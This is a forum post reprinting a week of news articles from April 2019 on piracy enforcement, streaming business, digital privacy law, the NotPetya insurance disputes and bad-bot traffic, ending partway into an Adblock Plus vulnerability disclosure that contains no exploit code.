P2P-Zone  

17-04-19, 06:17 AM   #1
JackSpratts
Peer-To-Peer News - The Week In Review - April 20th, ’19

Since 2002


































"Piracy has been the most successful form of distribution worldwide. If someone like you steals my films through the internet or whatever, fine, you have my blessing." – Werner Herzog






































April 20th, 2019




ISPs in India Ordered to Block Pirate Bay, Torrentz2, YTS, and 1337x
Bill Toulas

• The High Court in New Delhi is ordering Indian ISPs to block several pirating websites.
• The court is giving the ISPs an active participation role in the copyright infringement, leaving them no margins for disobedience.
• The order also contains a suggestion for warning pirates and even imposing fines on repeat offenders.

ISPs (Internet Service Providers) in India have been ordered by the High Court of Delhi to block certain torrenting websites that are known to have a history of allowing their visitors to exchange pirated content. The list includes 1337x.to, torrentz2.eu, bmovies.to (and proxies), fmovies.to (and proxies), rarbg.com (and proxies), thepiratebay.org (and proxies), yts.am (and proxies), torrentz.ht, extrattorent.ag, and torrentmovies.co. As the court order maintains, the ISPs are serving as “inevitable actors in any transmission of infringing data over the internet, and their services are therefore used to infringe copyright.”

There is no doubt that the ISPs in India will comply with the court’s order, and the lengthy justification that presents international examples of blockages of the particular websites goes on for 99 pages. The court is putting Indian ISPs in the position of a copyright-infringing accessory, liable for violation of Section 51 of the Copyright Act. The blocking injunction extends to the blockage of new proxies that are sure to pop up, by simply having the plaintiffs (rightsholders) file a detailed affidavit and submit it to the ISPs for the imposition of new blockages.

The court goes a step further, assuming that most of the people who are involved in piracy do not know or realize that the shared files are the products of piracy. To remedy this, the court suggests that the possibility of framing a policy under which a warning is issued to the viewers of infringing content should be explored. This means that pirates in India may soon start getting pop-ups or email messages, warning them to cease viewing and downloading the infringing material. The court also suggests that if a user receives the warning and chooses to continue their pirating actions, they should then receive a fine.

Now, the choice of VPN solutions for Indian internet users becomes more imperative than ever, in order to stay safe and protected. Of course, we are not promoting the use of VPN apps for downloading torrents that share pirated content, but if you want to stay anonymous at all times no matter what you choose to do, check out our list with the best VPN for Indians that you have on that part.
https://www.technadu.com/isps-india-...s-1337x/64592/





Prison is Coming: Australians are Warned they Could be JAILED if Caught Illegally Downloading the Final Game of Thrones Season

• Australians looking to illegally download Game of Thrones have been warned
• Potential online pirates have been warned they could face jail time if caught
• Up to 30 per cent of Australians watching Game of Thrones do it illegally

Adam Mccleery

Game of Thrones is considered the most pirated show on television with 1.77million Australians illegally downloading the seventh season in 2017, 7 News reported.

A survey from finder.com.au found 30 per cent of Australians who watch the show downloaded it illegally.

Creative Content Australia executive director Lori Flekser told 7 News the crackdown wasn't just about stopping revenue loss.

'It's not just about the revenue, it is about the overall investment in great screen content that is affected,' she said.

New anti-piracy laws were also introduced after the seventh season of Game of Thrones aired in 2017.

The number of downloads dropped from 29 per cent to 19 per cent when the laws were introduced.

Australian Home Entertainment Distributors Association chief executive Simon Bush said Foxtel, which owns the Australian rights to the hit series, invested heavily in local content and illegal downloads impacted on that investment.

'Foxtel invests in Australian drama and it has paid for the rights to Game of Thrones to support their subscription business model,' he said.

'If we want Australian production, then don't pirate Game of Thrones, just go out and pay your small subscription amount.'

The finder.com.au survey found most states had similar illegal download rates, somewhere between 30 per cent and 40 per cent, while South Australia proved the most trustworthy with only 19 per cent pirating.

A 2018 government report found the number of people illegally downloading content had been gradually dropping.

However, those that were pirating were downloading more illegal content than ever before.

In 2015, 57 per cent of Australians consumed lawful digital content, rising to 67 per cent in 2018.

Many of those surveyed for the government report agreed piracy was wrong and said they would refrain from doing it if content was cheaper.

Of the respondents to the survey who used paid content services, 34 per cent said it was because they don't want to use sites providing illegal content.

Speed and convenience were given as a reason by 49 per cent of respondents, and 36 per cent said paid services provided better quality.

The 2018 online copyright infringement survey garnered 2,453 responses, and showed an increase in streaming and a decrease in downloading.

Meanwhile, in 2017, Sydney man Haidar Majid Salam Al Baghdadi was convicted for content piracy and sentenced to 18 months jail, according to news.com.au.

The court heard Australian Federal Police, Foxtel investigators and Irdeto, a digital platform security business, uncovered a 'criminal network' of content piracy.

Then chief executive of Foxtel, Peter Tonagh, was pleased with the result and said it was justice being served.

'(Foxtel) hopes it sends a strong signal that this type of activity is illegal,' he said.

'Foxtel takes intellectual property theft very seriously as it severely undermines the creative industry including every business and individual that works so hard to deliver us the movies, sport, drama and entertainment we love.'

In its fight against online piracy Foxtel successfully lodged applications to have a number of websites blocked under anti-piracy laws including The Pirate Bay, isohunt and Torrentz.
https://www.dailymail.co.uk/news/art...es-season.html





Multichoice Says More than 2 Million People are Pirating Shows Available on DStv in South Africa
Staff Writer

Icasa published its draft findings in respect of the Inquiry into Subscription Television Broadcasting Services on 12 April 2019.

The 184-page document is full of commentary from South Africa’s biggest media players, with some of the most interesting information coming from Multichoice.

Multichoice said that it has not only seen increased competition from the emergence of legitimate providers – such as Netflix – but also from piracy.

“The piracy of electronic audio-visual content is on the rise and posing a huge threat to traditional Pay TV services,” it said.

“For example, MultiChoice estimates that more than two million people view pirated versions of the series and movies available on DStv in South Africa.

“Piracy in sports is also pervasive. The reality is that piracy is a further competitive constraint on Pay TV services in South Africa.”

However, Icasa said that it wasn’t sure how much piracy actually constrained subscription broadcasting as claimed by Multichoice.

“The authority considered the advent of piracy and whether it constrains subscription broadcasting as claimed by Multichoice,” it said.

“It came to the conclusion that since there are various efforts to stem the tide of piracy not only in South Africa but globally, it does not offer a strong competitive constraint on subscription television.”
https://businesstech.co.za/news/medi...-south-africa/





Game of Thrones Season 8 Episode 1 Leaked Online by Tamilrockers

HBO's popular show Game of Thrones is the latest victim of piracy website Tamilrockers.
Entertainment Desk

The first episode of Game of Thrones’ final season has been leaked online by Tamilrockers. The notorious piracy website has been a pain for film and television production companies. It began by pirating South Indian movies, but now uploads high-quality versions of Bollywood and Hollywood movies and shows.

This is despite the stringent action that has been taken against the site by the court and police. After a plea by Lyca Productions, the Madras High Court ordered all internet service providers to block Tamilrockers.

Despite these attempts, Tamilrockers continues to operate.

Game of Thrones’ final season will wrap up the two major conflicts of the show. The first one is the struggle for the Iron Throne and the other is the upcoming war between the Night King and his Army of the Dead vs the living people of Westeros.

Major players with a few exceptions like Cersei Lannister have gathered at Winterfell to make a stand against the invading undead army led by the Night King and his White Walker lieutenants.

The Night King’s ultimate goal is to obliterate every living thing on the continent. The commanders on the other side are Jon Snow and Daenerys Targaryen. The one thing that can work in favour of Jon and Dany is the two surviving dragons.

Game of Thrones airs on Star World in India. It also streams on Hotstar.
https://indianexpress.com/article/en...ckers-5675826/





Chinese Game of Thrones Fans Resigned to Final Season Censorship

• Medieval drama is known for its X-rated content, but audiences in China are unlikely to see much sex or violence
• Scenes of nudity and swearing were cut from earlier instalments of the hit HBO series, which is broadcast by Tencent Video in China

Sarah Zheng

Winter is coming for fans of the hit television series Game of Thrones, with the final season set to hit screens around the world after a near two-year hiatus, but those watching inside China are also bracing for the chill of censorship.

Despite being name-dropped by Chinese Premier Li Keqiang last week before travelling to Dubrovnik – one of the show’s filming locations – the final instalment of the fantasy drama known for its explicit scenes of sex and violence is unlikely to be seen in its entirety in the Middle Kingdom.

Season 8 will be streamed online on Monday morning by Tencent Video, a unit of Chinese tech giant Tencent, which gained exclusive distribution rights to the show in 2014 from HBO, the show’s American network producer.

HBO’s website has been blocked in mainland China since June, after English comedian and broadcaster cracked jokes about Chinese President Xi Jinping on his satirical television show Last Week Tonight.

Anticipation for the new Game of Thrones season in China is nonetheless soaring, with a discussion topic on Weibo – China’s Twitter-like platform – racking up 96 million views on Sunday afternoon. But fans know all too well that the show is unlikely to escape the censor’s scissors.

In the opening episode of season 7, for instance, parts of a scene in which an Archmaester slices open a corpse and asks steward Samwell Tarly to weigh its heart were omitted, and a line of dialogue spoken by Sandor Clegane to Lord Beric Dondarrion in which he says: “If he is so all powerful, why doesn’t he just tell you what the f*** he wants” was also removed.

Audiences in China were similarly deprived of a scene in the very first season of Game of Thrones in which brother and sister Viserys and Daenerys Targaryen are seen together as she prepares to take a bath. In the unedited version shown on HBO, Daenerys is seen completely naked.

“I’m begging Father Tencent not to censor too much, thank you,” one Weibo user wrote.

“This censored version is not interesting,” said another. “I would pay money to watch the uncut version.”

In recent years, Chinese authorities have ramped up the pressure on the television and film industries to clean up content they deem vulgar or politically incorrect. This has led to some serious censorship of foreign productions.

Recent examples include the removal of scenes of smashed heads and bare flesh from the American superhero film Logan, and the apparent manipulation of a scene in Oscar-winner The Shape of Water so that a naked woman is made to appear to be wearing clothes.

Locally produced content has been equally hard hit, with clean-up campaigns targeting the internet and broadcast media resulting in the blurring of images showing men wearing earrings or people smoking, and the removal of any scenes of a sexual, violent or satirical nature.

In a bid to get around the censorship, many Chinese Game of Thrones fans have turned to virtual private networks and torrent download websites to access unexpurgated versions of their favourite episodes.

The restrictions in China are not bad news for everyone, however. Thanks in part to it holding exclusive rights to Game of Thrones, Tencent Video saw its registered subscriber base expand by 58 per cent in the final quarter of last year to 89 million. It is now the country’s largest video streaming platform. The company did not immediately respond to requests for comment on Sunday.

Despite the anticipated cuts, many social media users remained upbeat about the upcoming finale to the medieval drama about feuding dynasties, suggesting the trimmed episodes they got to see might actually put them at an advantage.

“Those of us in China will know the ending to the show before people abroad,” one Weibo user joked. “Does that mean we can leak spoilers to everyone else?”

Another was more stoical about the whole thing, saying: “As long as the overall plot feeling is not censored, it is not terrible.”
https://www.scmp.com/news/china/soci...son-censorship





AT&T May Have Just Signaled the End of Hulu as You Know it Today

AT&T just sold its stake, leaving Disney with overwhelming control
Chaim Gartenberg

Hulu might look very different a year from now. AT&T has sold its roughly 10 percent stake in Hulu back to the streaming service today for $1.43 billion dollars, making it that much more likely that Hulu will become a Disney-centric service in the future.

Just last year, Hulu was still divided evenly between Disney, Fox, and Comcast — each owning a 30 percent cut of the company — alongside AT&T’s roughly 10 percent stake. But Disney gained a controlling interest in Hulu when it bought Fox, and the AT&T sale means Disney now owns a staggering 66 percent of the service, with Comcast owning the remaining 33 percent.

But it’s not just about the money and the percent-ownership; Disney gaining even more control over Hulu could also mean a radical shift in what Hulu even is. Right now, the service offers streaming content from a huge range of providers, including Comcast-owned NBC and Universal, and AT&T-owned networks like TBS and TNT.

Now that AT&T no longer has skin in the game, it’s easy to imagine a future where the company pulls its shows entirely in favor of its own streaming efforts. (AT&T now has its own video empire after purchasing Time Warner, after all.) And if Comcast follows suit, it could leave Hulu as an exclusively Disney service that complements the upcoming $7-a-month Disney+. Disney has even hinted as much, with the company highlighting in the past few days the different roles it intends for Hulu and Disney+, with Hulu offering more mature content, and even the potential for a joint bundle. (Perhaps AT&T saw the writing on the wall when Disney assumed control.)

While that’s good for Disney, it’s a decidedly less appealing future for consumers, who could see one of the last streaming services to offer cross-network content get fractured into even more monthly fees to watch all your shows.
https://www.theverge.com/2019/4/15/1...trol-streaming





Starz Apologizes for Taking Down Tweets to Torrentfreak Article Following Security Breach
Janko Roettgers

Updated. Facing a backlash over overzealous copyright enforcement, Starz issued an apology on Monday for inadvertently taking down tweets to articles about TV show piracy. The TV network said in a statement that it recently incurred a security breach, which prompted the company to hire a third party for copyright enforcement.

“The techniques and technologies employed in these efforts are not always perfect, and as such it appears that in this case, some posts were inadvertently caught up in the sweep that may fall outside the DMCA guidelines,” the network said in a statement.

“That was never our intention and we apologize to those who were incorrectly targeted. We are in the process of reviewing all of the impacted posts as well as the scope and procedure for the previous takedowns and are working with our vendors to reinstate any such content that was inappropriately targeted for removal.”

The apology came in response to a series of takedowns that started last week. Torrentfreak, a long-established website reporting on P2P and piracy, ran a story about a new flood of TV show leaks. The story mentioned that unreleased episodes from a number of shows, including Starz titles like “American Gods,” had appeared on piracy sites.

Torrentfreak didn’t link to any leaked episodes, or even mention the sites that were hosting those leaks. The site did identify a New York-based magazine editor as a possible source of the leaks, and also included a handful of screenshots in its reporting.

After Torrentfreak first published the story, Starz used a social media agency to have Twitter take down tweets to the story. Torrentfreak protested, and wrote a follow-up article about the takedowns — and promptly had tweets to that story taken down as well.

Some of the tweets in question, including Torrentfreak’s original tweet linking to its initial story, were reinstated Monday afternoon.

The tweet takedowns have been widely criticized, with the Electronic Frontier Foundation and others coming to Torrentfreak’s support. “The article reported that there are people on the internet infringing copyright, but that’s a far cry from being an infringement itself,” the digital rights group said in a tweet that also linked to Torrentfreak’s original story — which resulted in another DMCA takedown request.

A number of journalists also saw their tweets about the affair disappear, including Columbia Journalism Review chief digital writer Mathew Ingram, who called the takedowns “Kafka-esque.”

This is Kafka-esque: I posted yesterday about Twitter removing a tweet from TorrentFreak because it contained a link to an article about pirated copies of Starz shows appearing online (with no links to said content). Twitter has now removed my tweet linking to that story pic.twitter.com/pKF4VCRSit

— Mathew Ingram (@mathewi) April 14, 2019


The Digital Millennium Copyright Act’s safe harbor provisions force a platform like Twitter to take down allegedly infringing content after receiving a proper takedown notice from or on behalf of a copyright owner, but also allow users to appeal such takedowns. Ingram said he had appealed the takedown, but not received a response from Twitter yet.

Some argued on Monday that the episode showed that platforms make it too hard for users to object to takedowns. Twitter didn’t immediately respond to a request for comment.
https://variety.com/2019/digital/new...gy-1203189742/





Utah Bans Police From Searching Digital Data Without A Warrant, Closes Fourth Amendment Loophole
Nick Sibilla

Alexa, get a warrant.

In a major win for digital privacy, Utah became the first state in the nation to ban warrantless searches of electronic data. Under the Electronic Information or Data Privacy Act (HB 57), state law enforcement can only access someone’s transmitted or stored digital data (including writing, images, and audio) if a court issues a search warrant based on probable cause. Simply put, the act ensures that search engines, email providers, social media, cloud storage, and any other third-party “electronic communications service” or “remote computing service” are fully protected under the Fourth Amendment (and its equivalent in the Utah Constitution).

HB 57 also contains provisions that promote government transparency and accountability. In most cases, once agencies execute a warrant, they must then notify owners within 14 days that their data has been searched. Even more critically, HB 57 will prevent the government from using illegally obtained digital data as evidence in court.

In a concession to law enforcement, the act will let police obtain location-tracking information or subscriber data without a warrant if there’s an “imminent risk” of death, serious physical injury, sexual abuse, livestreamed sexual exploitation, kidnapping, or human trafficking.

Backed by the ACLU of Utah and the Libertas Institute, the act went through five different substitute versions before it was finally approved—without a single vote against it—last month. HB 57 is slated to take effect in mid-May.

Ensuring that the Fourth Amendment is still relevant can sound like an obvious, common-sense reform (and it is). Yet Utah’s new law is also a surprisingly radical break from the status quo. Thanks to the “third-party doctrine,” in 49 states and on the federal level, the government can access a striking amount of private data without a search warrant, simply by working through third parties.

Back in the late 1970s, the U.S. Supreme Court issued a pair of decisions (United States v. Miller and Smith v. Maryland) that upheld the warrantless searches of bank records and dialed phone numbers. In both cases, the court ruled that the defendants’ Fourth Amendment rights were not violated because they had no “legitimate expectation of privacy,” since they had “voluntarily conveyed” the information at hand to third parties.

The third-party doctrine, in other words, opened a massive loophole that bypasses the Fourth Amendment, letting the government collect reams of very personal information. Unfortunately, HB 57 does not extend to medical or financial records held by third parties, leaving Utahns still vulnerable to warrantless snooping.

Last year, the Supreme Court narrowed the third-party doctrine in Carpenter v. United States. By a margin of 5-4, the court ruled that accessing time-stamped mobile phone records known as “cell-site location information” (CSLI) qualifies as a search under the Fourth Amendment. “A person does not surrender all Fourth Amendment protection by venturing into the public sphere,” Chief Justice John Roberts wrote for the majority.

“When the Government tracks the location of a cell phone it achieves near perfect surveillance,” Roberts warned, “as if it had attached an ankle monitor to the phone’s user.” If the government wants to access CSLI, the chief justice bluntly told them to “get a warrant.”

In Carpenter, Roberts acknowledged that CSLI “does not fit neatly under existing precedents,” since it’s a form of “personal location information maintained by a third party.” As a result, the court “decline[d] to extend Smith and Miller.” “Given the unique nature of cell phone location records,” he wrote, “the fact that the information is held by a third party does not by itself overcome the user’s claim to Fourth Amendment protection.”

First, CSLI is automatically recorded any time someone uses their phone, without any input from the user, which undermines the notion that CSLI is “voluntarily” handed over. Moreover, phones have become so embedded and prevalent that “carrying one is indispensable to participation in modern society,” Roberts added.

Second, “seismic shifts in digital technology” mean that “there is a world of difference between the limited types of personal information addressed in Smith and Miller and the exhaustive chronicle of location information casually collected by wireless carriers today.” “With just the click of a button,” Roberts noted, “the Government can access each carrier’s deep repository of historical location information at practically no expense.” In the Carpenter case, the government obtained nearly 13,000 location points over 127 days when it investigated Timothy Carpenter for a series of robberies in Detroit.

Roberts convincingly explained why the third-party doctrine is a poor fit for CSLI. Yet even though many of those detailed reasons also apply to other forms of electronic data, the chief justice was adamant that his decision was a “narrow one.” Carpenter explicitly states that it does not directly consider the constitutionality of the government obtaining less than seven days’ worth of cell-site records, real-time CSLI, “conventional surveillance techniques and tools,” or business records, though many of those law enforcement tools are now covered by HB 57 in Utah.

While Carpenter’s long-term impact on digital data will largely depend on how the Supreme Court reconciles the decision with its woefully outdated precedents, in Utah, the Electronic Information or Data Privacy Act has already struck a major blow against the third-party doctrine. Utah’s sweeping reform warrants becoming a model for other states.
https://www.forbes.com/sites/nicksib...ment-loophole/





Law Enforcement Taps Google's Sensorvault for Location Data, Report Says

The database is for targeting ads and seeing how effective they are. But it's reportedly also been a treasure trove for police.
Richard Nieva

When law enforcement investigations get cold, there's a source authorities can turn to for location data that could produce new leads: Google.

Police have used information from the search giant's Sensorvault database to aid in criminal cases across the country, according to a report Saturday by The New York Times. The database has detailed location records from hundreds of millions of phones around the world, the report said. It's meant to collect information on the users of Google's products so the company can better target them with ads, and see how effective those ads are.

But police have been tapping into the database to help find missing pieces in investigations. Law enforcement can get "geofence" warrants seeking location data. Those kinds of requests have spiked in the last six months, and the company has received as many as 180 requests in one week, according to the report.

Google declined to answer specific questions about Sensorvault but said the company has narrowed how much identifiable information it gives police.

"We vigorously protect the privacy of our users while supporting the important work of law enforcement," Richard Salgado, Google's director of law enforcement and information security, said in a statement. "We have created a new process for these specific requests designed to honor our legal obligations while narrowing the scope of data disclosed and only producing information that identifies specific users where legally required."

For geofence warrants, police carve out a specific area and time period, and Google can gather information from Sensorvault about the devices that were present during that window, according to the report. The information is anonymous, but police can analyze it and narrow it down to a few devices they think might be relevant to the investigation. Then Google reveals those users' names and other data, according to the Times.

News of the law enforcement tactic comes as the tech industry faces intense scrutiny over its data collection practices. Facebook has been in the hot seat since its Cambridge Analytica scandal, in which user information from tens of millions of people was misused by a third party. Google has also been subjected to scrutiny after the AP reported last year that Google tracked people's location even after they'd turned off location-sharing on their phones.

It's not uncommon for law enforcement to seek help from tech companies during investigations. But the use of Sensorvault data has raised concerns about innocent people being implicated. For example, the Times interviewed a man who was arrested last year in a murder investigation after Google's data had reportedly landed him on the police's radar. But he was released from jail after a week, when investigators pinpointed and arrested another suspect.

https://www.cnet.com/news/law-enforc...a-report-says/





Big Tech Lobbying Gutted a Bill That Would Ban Recording You Without Consent
Rob Dozier

The Illinois Keep Internet Devices Safe Act would have empowered average people to sue big companies for recording them without consent, but industry association lobbying defanged it.

An Illinois bill that sought to empower average people to file lawsuits against tech companies for recording them without their knowledge via microphone-enabled devices was defanged this week after lobbying from trade associations representing Silicon Valley giants.

On Wednesday, the Illinois State Senate passed the Keep Internet Devices Safe Act, a bill that would ban manufacturers of devices that can record audio from doing so remotely without disclosing it to the customer. But after lobbying from trade associations that represent the interests of Google, Amazon—makers of the microphone-enabled Google Home and Alexa smart speakers, respectively—and Microsoft, among other companies, the interests of big tech won out.

In the bill’s original form, users could file a complaint with the Illinois Attorney General’s office that could lead to penalties of up to $50,000. But after technology trade associations, led by the Internet Association, objected, claiming that the state’s definition of a “digital device” was too broad, and that the Act would lead to “private litigation which can lead to frivolous class action litigation,” the bill was scaled back.

In its current, neutered form, the bill provides exclusive authority to the Attorney General to enforce the Act, which means regular citizens won’t be able to bring forward a case regarding tech giants recording them in their homes.

Matt Stoller, a research fellow at Open Markets Institute, an anti-monopoly advocacy group, shared the lobbying groups’ statements on Twitter.

Just this week, a report from Bloomberg detailed how Amazon employs thousands of people around the world to listen to commands spoken to its line of Echo speakers in order to improve its Alexa digital assistant, sometimes even after users opt out of having their data used in the program. Amazon workers reportedly heard the terms people were searching for online, private conversations, and unsettling situations like a potential assault—all connected to the user’s Amazon ID number and personally identifying information like their name.

The bill arrived in Illinois’ House of Representatives today, but unless Illinois’ Attorney General makes privacy violations an active priority, it’s not likely the bill will provide much more protection for consumers.
https://motherboard.vice.com/en_us/a...ithout-consent





Big Companies Thought Insurance Covered a Cyberattack. They May Be Wrong.
Adam Satariano and Nicole Perlroth

Within days of a cyberattack, warehouses of the snack foods company Mondelez International filled with a backlog of Oreo cookies and Ritz crackers.

Mondelez, owner of dozens of well-known food brands like Cadbury chocolate and Philadelphia cream cheese, was one of the hundreds of companies struck by the so-called NotPetya cyberstrike in 2017. Laptops froze suddenly as Mondelez employees worked at their desks. Email was unavailable, as was access to files on the corporate network. Logistics software that orchestrates deliveries and tracks invoices crashed.

Even with teams working around the clock, it was weeks before Mondelez recovered. Once the lost orders were tallied and the computer equipment was replaced, its financial hit was more than $100 million, according to court documents.

After the ordeal, executives at the company took some solace in knowing that insurance would help cover the costs. Or so they thought.

Mondelez’s insurer, Zurich Insurance, said it would not be sending a reimbursement check. It cited a common, but rarely used, clause in insurance contracts: the “war exclusion,” which protects insurers from being saddled with costs related to damage from war.

Mondelez was deemed collateral damage in a cyberwar.

The 2017 attack was a watershed moment for the insurance industry. Since then, insurers have been applying the war exemption to avoid claims related to digital attacks. In addition to Mondelez, the pharmaceutical giant Merck said insurers had denied claims after the NotPetya attack hit its sales research, sales and manufacturing operations, causing nearly $700 million in damage.

When the United States government assigned responsibility for NotPetya to Russia in 2018, insurers were provided with a justification for refusing to cover the damage. Just as they wouldn’t be liable if a bomb blew up a corporate building during an armed conflict, they claim not to be responsible when a state-backed hack strikes a computer network.

The disputes are playing out in court. In a closely watched legal battle, Mondelez sued Zurich Insurance last year for a breach of contract in an Illinois court, and Merck filed a similar suit in New Jersey in August. Merck sued more than 20 insurers that rejected claims related to the NotPetya attack, including several that cited the war exemption. The two cases could take years to resolve.

The legal fights will set a precedent about who pays when businesses are hit by a cyberattack blamed on a foreign government. The cases have broader implications for government officials, who have increasingly taken a bolder approach to naming-and-shaming state sponsors of cyberattacks, but now risk becoming enmeshed in corporate disputes by giving insurance companies a rationale to deny claims.

“You’re running a huge risk that cyberinsurance in the future will be worthless,” said Ariel Levite, a senior fellow at the Carnegie Endowment for International Peace, who has written about the case. But he said the insurance industry’s position on NotPetya is “not entirely frivolous, because it is widely believed that the Russians had been behind the attack.”

Mondelez said in a statement that while its business had recovered quickly from the attack, Zurich Insurance was responsible for honoring an insurance policy that explicitly covers cyber events. The company added that it did not believe the war exemption clause fit the circumstances.

Zurich Insurance, based in Switzerland, and Merck declined to comment because of the active litigation. But court documents, public filings and interviews with people familiar with cases provided details about the disputes.

Cyberattacks have created a unique challenge for insurers. Traditional practices, like not covering multiple buildings in the same neighborhood to avoid the risk of, say, a big fire, don’t apply. Malware moves fast and unpredictably, leaving an expensive trail of collateral damage.

“It cuts across practically every type of business activity,” Mr. Levite said. The risk, he said, “no longer can be contained in this interconnected world.”

NotPetya — which picked up the odd name because security researchers initially confused it with a piece of so-called ransomware called Petya — was a vivid example. It was also a powerful assault on computer networks that incorporated a stolen National Security Agency cyberweapon.

American officials tied the attack to Russia and its conflict with Ukraine. The original target was a Ukrainian tax software maker and its Ukrainian customers. In just 24 hours, NotPetya wiped clean 10 percent of all computers in Ukraine, paralyzing networks at banks, gas stations, hospitals, airports, power companies and nearly every government agency, and shutting down the radiation monitors at the old Chernobyl nuclear power plant.

The attack made its way to the software maker’s global clients, eventually entangling Mondelez and Merck, as well as the Danish shipping conglomerate Maersk and FedEx’s European subsidiary. It hit even Russia’s state-owned oil giant, Rosneft.

In a statement in 2018, the White House described NotPetya as “part of the Kremlin’s ongoing effort to destabilize Ukraine” and said it had demonstrated “ever more clearly Russia’s involvement in the ongoing conflict.”

Many insurance companies sell cyber coverage, but the policies are often written narrowly to cover costs related to the loss of customer data, such as helping a company provide credit checks or cover legal bills.

Mondelez, a former unit of Kraft Foods, argues that its property insurance package should cover the losses from the NotPetya attack. In court filings, Mondelez said its policy had been updated in 2016 to include losses caused by “the malicious introduction of a machine code or instruction.”

The company lost 1,700 servers and 24,000 laptops. Employees were left to communicate through WhatsApp, and executives posted updates on Yammer, a social network used by companies.

Damage from NotPetya spread all the way to Hobart, Tasmania, where computers in a Cadbury factory displayed so-called ransomware messages that demanded $300 in Bitcoin.

Courts often rule against insurers that try to apply the wartime exemption. After hijackers destroyed a Pan Am airliner in 1970, a United States court rejected Aetna’s attempt, determining that the action was criminal, not an act of war. In 1983, a judge ruled that Holiday Inn’s insurance policy covered damage from the civil war in Lebanon.

In the Mondelez and Merck lawsuits, the central question is whether the government’s attribution of the NotPetya attack to Russia meets the bar for the war exclusion.

Risk industry experts say cyberwar is still largely undefined. Attribution can be difficult when attacks come from groups with unofficial links to a state and the blamed government denies involvement.

“We still don’t have a clear idea of what cyberwar actually looks like,” said Jake Olcott, vice president at BitSight Technologies, a cyber risk adviser. “That is one of the struggles in this case. No one has said this was an all-out cyberwar by Russia.”

In the past, American officials were reluctant to qualify cyberattacks as cyberwar, fearing the term could provoke an escalation. President Barack Obama, for example, was careful to say the aggressive North Korean cyberattack on Sony Entertainment in 2014, which destroyed more than 70 percent of Sony’s computer servers, was an act of “cybervandalism.”

That label was sharply criticized by Senators John McCain and Lindsey Graham, who called the hack a “new form of warfare” and “terrorism.”

The description of the Sony attack was deliberate, said John Carlin, the assistant attorney general at the Justice Department at the time. In an interview, he said the Obama administration had worried, in part, that the use of “cyberwar” would have triggered the liability exclusions and fine print that Mondelez is now challenging in court.

Scott Kannry, the chief executive of the risk assessment firm Axio Global, said the insurance industry was watching the Mondelez case closely because many policies were created before cyberattacks were such an urgent risk.

“You have insurers who are sitting on insurance policies that were never underwritten or understood to cover cyber risk,” Mr. Kannry said. “Zurich didn’t underwrite the policy with the idea that a cyber event would cause the kind of losses that happened to Mondelez. Nobody is at war with Mondelez.”

Many insurance companies are rethinking their coverage. Since the lawsuits were filed, Shannan Fort, who specializes in cyberinsurance for Aon, one of the world’s largest insurance brokers, has been fielding calls from companies scrambling to be sure they’ll be safe if attacked, she said.

“I don’t want to scare people, but if a country or nation state attacks a very specific segment, like national infrastructure, is that cyberterrorism or is that an act of war?” Ms. Fort asked. “There is still a bit of gray area.”

Ty Sagalow, a former chief operating officer at the insurance giant A.I.G., helped pioneer the market for cyber risk insurance nearly two decades ago. He said his team had contemplated a “Cyber Pearl Harbor” attack not unlike the NotPetya attack.

“Cyberwar and cyberterrorism has always been a tricky area,” Mr. Sagalow said. Insurers risk abusing the war exclusion by not paying claims, he said, particularly when an attack “can hit companies that were not the original target of violence.”

Collateral damage from attacks that get out of control is going to become more and more common, he added. “That is what cyber is today,” Mr. Sagalow said. “And if you don’t like it, you shouldn’t be in the business.”
https://www.nytimes.com/2019/04/15/t...ya-attack.html





Bad Bots Now Make up 20 Percent of Web Traffic

Mimicking human mouse movements is only one of many tactics used to fly under the radar.
Charlie Osborne

Bots can be valuable tools for webmasters seeking additional visibility into their domains but malicious variants are a constant headache for online services.

So-called "bad bots" can be tasked with performing denial-of-service (DoS) attacks, they can scrape and steal data, they may be used to automatically publish fake content or reviews, and also skew advertising and visitor metrics.

Bots, in general, are estimated to make up roughly 37.9 percent of all Internet traffic. In 2018, one in five website requests -- 20.4 percent of traffic -- was generated by bad bots alone.

According to Distil Networks' latest bot report, "Bad Bot Report 2019: The Bot Arms Race Continues," the financial sector is the main target for such activity, followed by ticketing, the education sector, government websites, and gambling.

Based on the analysis of hundreds of billions of bad bot requests over 2018, simple bots, which are easy to detect and defend against, accounted for 26.4 percent of bad bot traffic. Meanwhile, 52.5 percent came from those considered to be "moderately" sophisticated, equipped with the capability to use headless browser software as well as JavaScript to conduct illicit activities.

A total of 73.6 percent of bad bots are classified as Advanced Persistent Bots (APBs), which are able to cycle through random IP addresses, switch their digital identities, and mimic human behavior.

An example of this is mouse mimicry, in which the bot is able to simulate mouse events a genuine visitor may perform on a website domain. These tactics are used to try and appear as a legitimate user for the purposes of ad fraud, as well as brute-force attacks against online accounts, competitive data mining, transaction fraud, spam, and phishing campaigns.

Amazon is the leading ISP for bad bot traffic origins. In total, 18 percent of bad bot traffic came from the firm's services, a jump from 10.62 percent in 2017.

Almost 50 percent of bad bots use Google Chrome as their user agent and 73.6 percent of bad bot traffic was recorded as originating from data centers, down from 82.7 percent in 2017.

The United States outstrips all other countries as a generator of bad bots. In total, 53.4 percent of bad bot traffic came from the US, followed by the Netherlands and China. The most blocked country by IP is Russia, together with Ukraine and India.

"Bot operators and bot defenders are playing an incessant game of cat and mouse, and techniques used today, such as mimicking mouse movements, are more human-like than ever before," said Tiffany Olson Kleemann, CEO of Distil Networks. "As sophistication strengthens, so too does the breadth of industries impacted by bad bots. When critical online activity, like voter registration, can be compromised as a result of bad bot activity, it no longer becomes a challenge to tackle tomorrow. Now is the time to understand what bots are capable of and now is the time to act."
https://www.zdnet.com/article/bad-bo...f-web-traffic/





Adblock Plus Filter Lists May Execute Arbitrary Code in Web Pages
Armin Sebastian

A new version of Adblock Plus was released on July 17, 2018. Version 3.2 introduced a new filter option for rewriting requests. A day later AdBlock followed suit and released support for the new filter option. uBlock, being owned by AdBlock, also implemented the feature.

Under certain conditions the $rewrite filter option enables filter list maintainers to inject arbitrary code in web pages.

The affected extensions have more than 100 million active users, and the feature is trivial to exploit in order to attack any sufficiently complex web service, including Google services, while attacks are difficult to detect and are deployable in all major browsers.

Considering the nature and implications of the uncovered vulnerabilities, and given that filter lists have been employed in the past for politically motivated attacks, details of the exploit chain are publicly disclosed to ensure the fastest possible propagation of upcoming mitigations in the affected browser extensions and web services.

Attack

The $rewrite filter option is used by some ad blockers to remove tracking data and block ads by redirecting requests. The option allows rewrites only within the same origin, and requests of SCRIPT, SUBDOCUMENT, OBJECT and OBJECT_SUBREQUEST types are not processed.

